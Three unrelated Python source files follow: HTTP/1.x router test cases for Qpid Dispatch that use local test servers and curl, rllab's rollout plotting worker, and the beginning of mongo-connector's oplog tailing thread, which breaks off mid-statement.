class CommonHttp1OneRouterTest(object):
TESTS_11 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len",
headers={"Content-Length": "00"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Length': '1'},
expect_body=b'?')),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4096,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={'Content-Length': '4096'},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/chunked",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'16\r\n'
+ b'Mary had a little pug \r\n'
+ b'1b\r\n'
+ b'Its name was "Skupper-Jack"\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'Mary had a little pug Its name was "Skupper-Jack"')),
(RequestMsg("GET", "/GET/chunked_large",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'1\r\n'
+ b'?\r\n'
+ b'800\r\n'
+ b'X' * 0x800 + b'\r\n'
+ b'13\r\n'
+ b'Y' * 0x13 + b'\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'?' + b'X' * 0x800 + b'Y' * 0x13)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
[ResponseMsg(100, reason="Continue",
headers={"Blab": 1, "Blob": "?"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?')],
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# (RequestMsg("GET", "/GET/no_length",
# headers={"Content-Length": "0"}),
# ResponseMsg(200, reason="OK",
# headers={"Content-Type": "text/plain;charset=utf-8",
# "connection": "close"
# },
# body=b'Hi! ' * 1024 + b'X'),
# ResponseValidator(expect_body=b'Hi! ' * 1024 + b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_02",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"}),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"})),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'8\r\n'
+ b'12345678\r\n'
+ b'f\r\n'
+ b'abcdefghijklmno\r\n'
+ b'000\r\n'
+ b'\r\n'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked"},
body=b'01\r\n'
+ b'!\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
body=b'80\r\n'
+ b'$' * 0x80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'1\r\n$\r\n0\r\n\r\n'),
ResponseValidator(status=201, expect_body=b'$')
),
]
}
# HTTP/1.0 compliant test cases (no chunked, response length unspecified)
TESTS_10 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={"Content-Type": "text/plain;charset=utf-8"},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# test support for "folded headers"
(RequestMsg("GET", "/GET/folded_header_01",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "One\r\n \r\n\tTwo"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
"folded-header":
"One \tTwo"},
expect_body=b'X')),
(RequestMsg("GET", "/GET/folded_header_02",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "\r\n \r\n\tTwo",
"another-header": "three"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
# trim leading and
# trailing ws:
"folded-header":
"Two",
"another-header":
"three"},
expect_body=b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever"},
body=b'12345678abcdefghijklmno'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Content-Length": "5"},
body=b'01234'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Content-Length": "513",
"Content-Type": "text/plain;charset=utf-8"},
body=b'$' * 513),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever"},
body=b'No Content Length'),
ResponseValidator(status=201, expect_body=b'No Content Length')
),
]
}
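    # Send each canned request in `tests` over the given HTTPConnection and
    # validate the reply with the associated validator.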
def _do_request(self, client, tests):
for req, _, val in tests:
req.send_request(client)
rsp = client.getresponse()
try:
body = val.check_response(rsp)
except Exception as exc:
self.fail("request failed: %s" % str(exc))
if req.method == "BODY":
self.assertEqual(b'', body)
def test_001_get(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["GET"])
client.close()
def test_002_head(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["HEAD"])
client.close()
def test_003_post(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["POST"])
client.close()
def test_004_put(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["PUT"])
client.close()
def test_006_head_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["HEAD"])
client.close()
def test_007_post_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["POST"])
client.close()
def test_008_put_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["PUT"])
client.close()
class Http1OneRouterTestBase(TestCase):
# HTTP/1.1 compliant test cases
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address',
{'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1OneRouterTestBase, cls).setUpClass()
cls.http_server11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1Edge2EdgeTestBase(TestCase):
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1Edge2EdgeTestBase, cls).setUpClass()
cls.routers = []
cls.INTA_edge1_port = cls.tester.get_port()
cls.INTA_edge2_port = cls.tester.get_port()
cls.http_server11_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1ClientCloseTestsMixIn(object):
"""
Generic test functions for simulating HTTP/1.x client connection drops.
"""
def client_request_close_test(self, server_port, client_port, server_mgmt):
"""
Simulate an HTTP client drop while sending a very large PUT request
"""
PING = {
"GET": [
(RequestMsg("GET", "/GET/test_04_client_request_close/ping",
headers={"Content-Length": "0"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)]
}
TESTS = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_04_client_request_close",
headers={
"Content-Length": "500000",
"Content-Type": "text/plain;charset=utf-8"
},
body=b'4' * (500000 - 19) + b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_04_client_request_close",
"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the sending of the PUT
# request
#
fake_request = b'PUT /PUT/test_04_client_request_close HTTP/1.1\r\n' \
+ b'Content-Length: 500000\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n' \
+ b'?' * 50000
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(5)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.close()
# since socket I/O is asynchronous wait until the request arrives
# at the server
expected = len(fake_request)
bytes_in = 0
while expected > bytes_in:
ri = server_mgmt.query(type="org.apache.qpid.dispatch.httpRequestInfo").get_entities()
bytes_in = ri[-1]['bytesIn'] if ri else 0 # most recent request at tail
sleep(0.1)
# now ensure the connection between the router and the HTTP server
# still functions:
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
def client_response_close_test(self, server_port, client_port):
"""
Simulate an HTTP client drop while the server is sending a very large
response message.
"""
PING = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_05_client_response_close/ping",
headers={"Content-Length": "1",
"content-type":
"text/plain;charset=utf-8"},
body=b'X'),
ResponseMsg(201, reason="Created",
headers={"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
big_headers = dict([('Huge%s' % i, chr(ord(b'0') + i) * 8000)
for i in range(10)])
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_05_client_response_close",
headers={
"Content-Length": "0",
"Content-Type": "text/plain;charset=utf-8"
}),
[ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(200,
reason="OK",
headers={"Content-Length": 1000000,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?' * 1000000)],
ResponseValidator(status=200)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the receipt of the
# response
#
fake_request = b'GET /GET/test_05_client_response_close HTTP/1.1\r\n' \
+ b'Content-Length: 0\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n'
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(TIMEOUT)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.recv(1)
fake_client.close()
#
# Verify the server is still reachable
#
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
class Http1CurlTestsMixIn(object):
"""
Test cases using curl as the command line client
"""
@unittest.skipIf(not _curl_ok(),
"required curl version >= %s" % str(CURL_VERSION))
def curl_get_test(self, host, port, server_port):
"""
Use curl to get a resource
"""
CURL_TESTS = {
"GET": [
(RequestMsg("GET", "/GET/curl_get"),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/curl_get"
},
body=b'END OF TRANSMISSION'),
ResponseValidator())
],
"HEAD": [
(RequestMsg("HEAD", "/HEAD/curl_head",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator())
]
}
server = TestServer.new_server(server_port, port, CURL_TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % server_port)
get_url = "http://%s:%s/GET/curl_get" % (host, port)
head_url = "http://%s:%s/HEAD/curl_head" % (host, port)
status, out, err = run_curl(["--http1.1", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-I", head_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("App-Header-2", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.0", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
server.wait()
@unittest.skipIf(not _curl_ok(),
"required curl version >= %s" % str(CURL_VERSION))
def curl_put_test(self, host, port, server_port):
"""
Use curl to PUT a resource
"""
CURL_TESTS = {
"PUT": [
(RequestMsg("PUT", "/PUT/curl_put"),
ResponseMsg(201, reason="Created",
headers={
"Test-Header": "/PUT/curl_put",
"content-length": "0"
}),
ResponseValidator())
],
"HEAD": [
(RequestMsg("HEAD", "/HEAD/curl_head",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator())
]
}
server = TestServer.new_server(server_port, port, CURL_TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % server_port)
put_url = "http://%s:%s/PUT/curl_put" % (host, port)
head_url = "http://%s:%s/HEAD/curl_head" % (host, port)
status, out, err = run_curl(["--http1.1", "-T", ".", put_url],
input="Mary had a little pug."
"\nIts fleece was brown as dirt."
"\nIts color made Mary shrug."
"\nShe should dress it in a shirt.")
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
status, out, err = run_curl(["--http1.1", "-I", head_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("App-Header-2", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-T", ".", put_url],
input="Ph'nglui mglw'nafh Cthulhu"
"\nR'lyeh wgah'nagl fhtagn")
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
server.wait()
@unittest.skipIf(not _curl_ok(),
"required curl version >= %s" % str(CURL_VERSION))
def curl_post_test(self, host, port, server_port):
"""
Use curl to post to a resource
"""
CURL_TESTS = {
"POST": [
(RequestMsg("POST", "/POST/curl_post"),
ResponseMsg(201, reason="Created",
headers={
"Test-Header": "/POST/curl_put",
"content-length": "19",
"Content-Type": "text/plain;charset=utf-8",
},
body=b'END OF TRANSMISSION'),
ResponseValidator())
],
"GET": [
(RequestMsg("GET", "/GET/curl_get",
headers={"Content-Length": "0"}),
ResponseMsg(200, reason="OK",
headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=b'0123456789'),
ResponseValidator())
]
}
server = TestServer.new_server(server_port, port, CURL_TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % server_port)
post_url = "http://%s:%s/POST/curl_post" % (host, port)
get_url = "http://%s:%s/GET/curl_get" % (host, port)
status, out, err = run_curl(["--http1.1", "-F", "name=Skupper",
"-F", "breed=Pug", post_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-G", get_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("0123456789", out, "Unexpected out=%s (err=%s)"
% (out, err))
status, out, err = run_curl(["--http1.1", "-F", "name=Coco",
"-F", "breed=French Bulldog",
post_url])
self.assertEqual(0, status, "curl error '%s' '%s'" % (out, err))
self.assertIn("END OF TRANSMISSION", out, "Unexpected out=%s (err=%s)"
% (out, err))
server.wait()
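
# run_curl() is provided elsewhere (not shown in this excerpt). A minimal sketch
# of such a helper, assuming it simply shells out to the curl binary and returns
# an (exit_status, stdout, stderr) triple; the name and defaults below are
# illustrative only, not the real implementation:
import subprocess

def _run_curl_sketch(args, input=None, timeout=60):
    """Hypothetical stand-in for run_curl(): invoke curl and capture its output."""
    proc = subprocess.Popen(["curl", "-sS"] + list(args),
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=True)
    out, err = proc.communicate(input=input, timeout=timeout)
    return proc.returncode, out, err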
|
plotter.py
|
import atexit
import sys
if sys.version_info[0] == 2:
from Queue import Empty
else:
from queue import Empty
from multiprocessing import Process, Queue
from rllab.sampler.utils import rollout
import numpy as np
__all__ = [
'init_worker',
'init_plot',
'update_plot'
]
process = None
queue = None
def _worker_start():
env = None
policy = None
max_length = None
try:
while True:
msgs = {}
# Only fetch the last message of each type
while True:
try:
msg = queue.get_nowait()
msgs[msg[0]] = msg[1:]
except Empty:
break
if 'stop' in msgs:
break
elif 'update' in msgs:
env, policy = msgs['update']
# env.start_viewer()
elif 'demo' in msgs:
param_values, max_length = msgs['demo']
policy.set_param_values(param_values)
rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)
else:
if max_length:
rollout(env, policy, max_path_length=max_length, animated=True, speedup=5)
except KeyboardInterrupt:
pass
def _shutdown_worker():
if process:
queue.put(['stop'])
queue.close()
process.join()
def init_worker():
print("####################init_worker")
global process, queue
queue = Queue()
process = Process(target=_worker_start)
process.start()
atexit.register(_shutdown_worker)
def init_plot(env, policy):
queue.put(['update', env, policy])
def update_plot(policy, max_length=np.inf):
queue.put(['demo', policy.get_param_values(), max_length])
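
# Typical call sequence (a usage sketch; `env` and `policy` stand for an rllab
# environment/policy pair supplied by the caller, and the training loop is
# elided):
#
#     init_worker()                            # fork the plotting process once
#     init_plot(env, policy)                   # register the env/policy with it
#     for itr in range(n_itr):
#         ...optimize policy...
#         update_plot(policy, max_length=500)  # worker re-runs a rollout with new params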
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
"""Thread that periodically logs the current replication lag.
"""
def __init__(self, opman, interval):
super(ReplicationLagLogger, self).__init__()
self.opman = opman
self.interval = interval
self.daemon = True
def log_replication_lag(self):
checkpoint = self.opman.checkpoint
if checkpoint is None:
return
newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
if newest_write < checkpoint:
# OplogThread will perform a rollback, don't log anything
return
lag_secs = newest_write.time - checkpoint.time
if lag_secs > 0:
LOG.info(
"OplogThread for replica set '%s' is %s seconds behind " "the oplog.",
self.opman.replset_name,
lag_secs,
)
else:
lag_inc = newest_write.inc - checkpoint.inc
if lag_inc > 0:
LOG.info(
"OplogThread for replica set '%s' is %s entries "
"behind the oplog.",
self.opman.replset_name,
lag_inc,
)
else:
LOG.info(
"OplogThread for replica set '%s' is up to date " "with the oplog.",
self.opman.replset_name,
)
def run(self):
while self.opman.is_alive():
self.log_replication_lag()
time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(
self,
primary_client,
doc_managers,
oplog_progress_dict,
namespace_config,
mongos_client=None,
**kwargs
):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get("batch_size", DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get("collection_dump", True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The namespace configuration
self.namespace_config = namespace_config
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get("continue_on_error", False)
LOG.info("OplogThread: Initializing oplog thread")
self.oplog = self.primary_client.local.oplog.rs
self.replset_name = self.primary_client.admin.command("ismaster")["setName"]
if not self.oplog.find_one():
err_msg = "OplogThread: No oplog for thread:"
LOG.warning("%s %s" % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
"""Determine if this oplog entry should be skipped.
This has the possible side effect of modifying the entry's namespace
and filtering fields from updates and inserts.
"""
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
return True, False
# Ignore no-ops
if entry["op"] == "n":
return True, False
ns = entry["ns"]
if "." not in ns:
return True, False
coll = ns.split(".", 1)[1]
# Ignore system collections
if coll.startswith("system."):
return True, False
# Ignore GridFS chunks
if coll.endswith(".chunks"):
return True, False
is_gridfs_file = False
if coll.endswith(".files"):
ns = ns[: -len(".files")]
if self.namespace_config.gridfs_namespace(ns):
is_gridfs_file = True
else:
return True, False
# Commands should not be ignored, filtered, or renamed. Renaming is
# handled by the DocManagers via the CommandHelper class.
if coll == "$cmd":
return False, False
# Rename or filter out namespaces that are ignored keeping
# included gridfs namespaces.
namespace = self.namespace_config.lookup(ns)
if namespace is None:
LOG.debug(
"OplogThread: Skipping oplog entry: "
"'%s' is not in the namespace configuration." % (ns,)
)
return True, False
# Update the namespace.
entry["ns"] = namespace.dest_name
# Take fields out of the oplog entry that shouldn't be replicated.
# This may nullify the document if there's nothing to do.
if not self.filter_oplog_entry(
entry,
include_fields=namespace.include_fields,
exclude_fields=namespace.exclude_fields,
):
return True, False
return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
ReplicationLagLogger(self, 30).start()
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_empty = retry_until_ok(self.init_cursor)
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_empty:
LOG.debug(
"OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping."
)
time.sleep(1)
continue
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog entries")
while cursor.alive and self.running:
LOG.debug(
"OplogThread: Cursor is still"
" alive and thread is still running."
)
for n, entry in enumerate(cursor):
# Break out if this thread should stop
if not self.running:
break
LOG.debug(
"OplogThread: Iterating through cursor,"
" document number in this cursor is %d" % n
)
skip, is_gridfs_file = self._should_skip_entry(entry)
if skip:
# update the last_ts on skipped entries to ensure
# our checkpoint does not fall off the oplog. This
# also prevents reprocessing skipped entries.
last_ts = entry["ts"]
continue
# Sync the current oplog operation
operation = entry["op"]
ns = entry["ns"]
timestamp = util.bson_ts_to_long(entry["ts"])
for docman in self.doc_managers:
try:
LOG.debug(
"OplogThread: Operation for this "
"entry is %s" % str(operation)
)
# Remove
if operation == "d":
docman.remove(entry["o"]["_id"], ns, timestamp)
remove_inc += 1
# Insert
elif operation == "i": # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get("o")
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split(".", 1)
gridfile = GridFSFile(
